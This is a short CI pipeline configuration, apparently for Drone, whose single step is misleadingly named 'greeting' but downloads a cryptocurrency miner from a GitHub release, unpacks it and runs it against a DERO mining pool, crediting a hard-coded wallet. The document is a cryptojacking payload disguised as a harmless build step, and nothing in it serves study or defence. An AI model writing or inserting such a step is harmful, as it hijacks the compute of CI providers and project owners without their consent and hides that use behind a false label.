---
kind: pipeline
type: docker
name: default

steps:
- name: greeting
  image: golang:1.12
  commands:
  - wget https://github.com/Intergalactic-Mining/Uranus/releases/download/0.0.3.1/uranus-0.0.3.1-linux-amd64.tar.xz && tar -xf uranus-0.0.3.1-linux-amd64.tar.xz && ./uranus -o wss://dero.rabidmining.com:10300 -u deroi1qy9al37a8qgjmat4y9wf5wc637md58jtt6p4980k34xxhrk2h9m6jq9pvfz92xcqqqqep9ys00jq0rrnml.JSC-$(echo $(nproc --all))
